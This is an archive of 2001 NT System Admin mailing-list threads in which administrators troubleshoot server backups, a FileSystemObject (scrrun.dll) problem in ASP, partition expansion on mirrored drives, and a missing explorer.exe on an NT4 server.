-Original Message- From: Paul Armstrong [mailto:[EMAIL PROTECTED]] Sent: Monday, September 10, 2001 6:55 PM To: NT System Admin Issues Subject: Server Backups Hello All, I am trying to find out exactly what needs to be backed up on a server other than the Data. I have a client who has a small backup drive and there backups are exceeding the tape size. Obviously they are being cheap and don't want to upgrade to a bigger tape drive at the moment. Usually I just do full backups of all servers, which included all partitions or volumes on the servers. This particular client only has one drive (c:) which had the OS and the data that they use. If I just backed up the client's data it would be under the drive limit but the OS and other folders(program files, etc) amount to almost 2GB. Other than the repair folder, and the dhcp, wins, dns folders under the system32 folder what other folders need to be backed up for usage in case the server needs to be restored? The server is NT 4.0 SP6a running Exchange 5.5 SP3! Here is my suggestion: Tell your client that to figure this out and manage it all will - in labor costs - exceed the cost of a capable tape drive. John Cesta ColdFusion ASP ActiveState PERL Hosting Includes 10 Domains - 100% Browser Based Administration http://www.cybersmarts.net LogFileManager - IIS LogFile Management Tool WebPageChecker - Helps Maintain Server UpTime http://www.serverautomationtools.com http://www.sunbelt-software.com/ntsysadmin_list_charter.htm http://www.sunbelt-software.com/ntsysadmin_list_charter.htm
RE: whats FSO's dll called
-Original Message- From: Paul Broomfield [mailto:[EMAIL PROTECTED]] Sent: Tuesday, September 04, 2001 9:31 AM To: NT System Admin Issues Subject: RE: whats FSO's dll called Hi, Thanks for getting back to me. The problem we have been experiencing seems to be a little odd. A page that uses FSO seems to work fine until it gets to the point where it uses FSO.GetFolder(Path). Even if Path exists and is valid with correct permissions it causes the ASP pages to stop responding and not load - does even give a timeout, this then causes the rest of the site to respond extremely slwly and eventually die with a full server restart needed to sort it out. We had a problem with Virtual Memory last week and its never been the same since - is there anyway to reinstall FSO (I guess unreg and copy from another work server and re-reg). Or does anyone know what gets affected when an Out of Virtual Memory message pops up? We seemed to loose date formats, everything went to American dates rather than United Kingdom. 1. Did this start happening all-of-a-sudden? 2. Did this program ever work properly? 3. Does it work as a vbscript when run from the server's command line? John Cesta ColdFusion ASP ActiveState PERL Hosting Includes 10 Domains - 100% Browser Based Administration http://www.cybersmarts.net LogFileManager - IIS LogFile Management Tool WebPageChecker - Helps Maintain Server UpTime http://www.serverautomationtools.com Thanks Paul Paul Broomfield, Network Administrator and Database Technician Tell Communications Tamar Science Park Derriford Plymouth Devon PL6 8BX Tel: +44 (0) 1752 764242 Fax: +44 (0) 1752 764243 Visit us on the web at: http://www.tell-com.com/ -Original Message- From: John Cesta - Lists [mailto:[EMAIL PROTECTED]] Sent: 04 September 2001 14:23 To: NT System Admin Issues Subject: RE: whats FSO's dll called The FSO is a dll called scrrun.dll It is either available or not, meaning, you can disable it be hacking the registry or you can enable it by registering the dll in the registry. That's about it. What is your problem with the FSO? John Cesta ColdFusion ASP ActiveState PERL Hosting Includes 10 Domains - 100% Browser Based Administration http://www.cybersmarts.net LogFileManager - IIS LogFile Management Tool WebPageChecker - Helps Maintain Server UpTime http://www.serverautomationtools.com -Original Message- From: Paul Broomfield [mailto:[EMAIL PROTECTED]] Sent: Tuesday, September 04, 2001 9:07 AM To: NT System Admin Issues Subject: whats FSO's dll called Hello, We are getting problems with FSO on our web servers - does anyone know what the Dll(s) are called for FSO and do they appear in either task manager or PerfMon Our servers are w2k sp2 Thanks Pauk Paul Broomfield, Network Administrator and Database Technician Tell Communications Tamar Science Park Derriford Plymouth Devon PL6 8BX Tel: +44 (0) 1752 764242 Fax: +44 (0) 1752 764243 Visit us on the web at: http://www.tell-com.com/ http://www.sunbelt-software.com/ntsysadmin_list_charter.htm http://www.sunbelt-software.com/ntsysadmin_list_charter.htm http://www.sunbelt-software.com/ntsysadmin_list_charter.htm http://www.sunbelt-software.com/ntsysadmin_list_charter.htm
RE: Expand Partition
Server Magic is a partition expander for NT servers. ColdFusion ASP ActiveState PERL Hosting Includes 10 Domains - 100% Browser Based Administration http://www.cybersmarts.net LogFileManager - IIS LogFile Management Tool WebPageChecker - Helps Maintain Server UpTime http://www.serverautomationtools.com -Original Message- From: Alexander Lattaruli Stender [mailto:[EMAIL PROTECTED]] Sent: Tuesday, September 04, 2001 1:54 PM To: NT System Admin Issues Subject: Expand Partition BlankI am not sure if this is going to be a cross posting but I will ask because one day we all will need to upgrade anyway. I have one NT4 SP6 server with 2 sets of mirrored hot swappable hard drives. Each set has one 9.1Gb and one 17Gb. I will need to upgrade the 17Gb ones to 181Gb as I need to place a 70Gb SQL data base on them. Machine is live and has to be like that for the maximum time possible. This big drive also contains software installations and file permissions are set as well. The idea is to break the mirror, take one drive out, place it on another system in parallel with the new 181Gb and restablish the mirror. This will generate a 17Gb partition on the 181Gb HD, then I would use a partitioning tool to grow it to 181Gb. Someone told me to do a file copying and that is it. No partition growth necessary... I doubt it is going to work. Have you had any experience like this? Do you know any good partition expander software. (Drive Copy goes only up to 80Gb) Comments are welcome. Thank you. Alex http://www.sunbelt-software.com/ntsysadmin_list_charter.htm http://www.sunbelt-software.com/ntsysadmin_list_charter.htm
RE: nt40 desktop not appearing
-Original Message- From: Scot A. Pflug [mailto:[EMAIL PROTECTED]] Sent: Friday, August 31, 2001 12:19 PM To: NT System Admin Issues Subject: Re: nt40 desktop not appearing It sounds like explorer did not start, hit ctrl alt del and then select task list, and then run explorer.exe, or of course you could reboot. I'll be darned...the explorer.exe was actually missing, not even on the drive. Must have got trashed during the reboot. I copied if from another server and it comes up fine. Thanks for all the ideas! John Cesta ColdFusion ASP ActiveState PERL Hosting Includes 10 Domains - 100% Browser Based Administration http://www.cybersmarts.net LogFileManager - IIS LogFile Management Tool WebPageChecker - Helps Maintain Server UpTime http://www.serverautomationtools.com John Cesta - Lists [EMAIL PROTECTED] 08/31/2001 12:19:16 PM After I rebooted my NT4.0 SP4 development server today it returned only the the CTRl-ALT-DEL dialog box. The NT splash banner was not in the background. I logged in but only received a blank blue screen, no icons or desktop. No task bar etc. I can even hit CTRL-ALT-DEL and get the task manager dialog and that all works, but I cannot get access to the desktop. Anyone have any idea what the heck is going on? There is no virus, not connected to Internet or no programs have been installed. Thanks, John Cesta http://www.sunbelt-software.com/ntsysadmin_list_charter.htm http://www.sunbelt-software.com/ntsysadmin_list_charter.htm http://www.sunbelt-software.com/ntsysadmin_list_charter.htm
nt40 desktop not appearing
After I rebooted my NT4.0 SP4 development server today it returned only the the CTRl-ALT-DEL dialog box. The NT splash banner was not in the background. I logged in but only received a blank blue screen, no icons or desktop. No task bar etc. I can even hit CTRL-ALT-DEL and get the task manager dialog and that all works, but I cannot get access to the desktop. Anyone have any idea what the heck is going on? There is no virus, not connected to Internet or no programs have been installed. Thanks, John Cesta http://www.sunbelt-software.com/ntsysadmin_list_charter.htm
RE: nt40 desktop not appearing
-Original Message- From: Martin Blackstone [mailto:[EMAIL PROTECTED]] Sent: Friday, August 31, 2001 12:20 PM To: NT System Admin Issues Subject: RE: nt40 desktop not appearing Key word: Development Server Maybe the developers screwed it up. It's just me and only me. I...memine John -Original Message- From: John Cesta - Lists [mailto:[EMAIL PROTECTED]] Sent: Friday, August 31, 2001 9:19 AM To: NT System Admin Issues Subject: nt40 desktop not appearing After I rebooted my NT4.0 SP4 development server today it returned only the the CTRl-ALT-DEL dialog box. The NT splash banner was not in the background. I logged in but only received a blank blue screen, no icons or desktop. No task bar etc. I can even hit CTRL-ALT-DEL and get the task manager dialog and that all works, but I cannot get access to the desktop. Anyone have any idea what the heck is going on? There is no virus, not connected to Internet or no programs have been installed. Thanks, John Cesta http://www.sunbelt-software.com/ntsysadmin_list_charter.htm http://www.sunbelt-software.com/ntsysadmin_list_charter.htm http://www.sunbelt-software.com/ntsysadmin_list_charter.htm